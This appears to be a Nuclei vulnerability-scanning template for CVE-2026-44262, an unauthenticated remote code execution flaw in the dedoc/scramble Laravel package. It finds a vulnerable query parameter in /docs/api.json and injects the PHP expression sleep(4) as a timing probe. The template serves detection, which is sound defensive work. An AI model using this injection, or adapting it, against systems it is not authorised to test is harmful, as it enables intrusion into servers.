id: CVE-2026-44262

info:
  name: dedoc/scramble - Unauthenticated Remote Code Execution
  author: joshuavanderpoll
  severity: critical
  description: |
    dedoc/scramble >=0.13.2 <0.13.22 is vulnerable to RCE via its OpenAPI doc
    generator. When a controller assigns $request->input() to a variable named
    $code and uses it in validate(), Scramble's NodeRulesEvaluator calls
    extract($variables) before eval("return $code;"), allowing an attacker to
    overwrite $code with arbitrary PHP via a query parameter.

    Detection uses a timing probe (sleep) — no destructive exploitation.
  reference:
    - https://github.com/joshuavanderpoll/CVE-2026-44262
    - https://github.com/advisories/GHSA-4rm2-28vj-fj39
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
    cvss-score: 9.4
    cve-id: CVE-2026-44262
    cwe-id: CWE-94
  tags: cve,cve2026,rce,laravel,scramble,php
  metadata:
    verified: true

flow: |
  http(1);
  try {
    if (template["vuln_param"]) {
      http(2);
    }
  } catch(e) {}

http:
  # Step 1: extract vulnerable param name — no matchers, just detection
  # extractor looks for a query param whose default resembles a Laravel validation rule
  - method: GET
    path:
      - "{{BaseURL}}/docs/api.json"

    extractors:
      - type: regex
        name: vuln_param
        internal: true
        # match "name": "X" followed within 300 chars by "default": "...|..." (rule-like)
        regex:
          - '"name"\s*:\s*"([^"]+)"[\s\S]{1,600}"default"\s*:\s*"[^"]*\|[^"]*"'
        group: 1
        part: body

  # Step 2: timing probe — only runs if vuln_param was found
  # sleep(4) triggers if eval() executes attacker input, causing a ~4s delay
  - method: GET
    path:
      - "{{BaseURL}}/docs/api.json?{{vuln_param}}=sleep(4)"

    matchers:
      - type: dsl
        dsl:
          - "duration >= 3"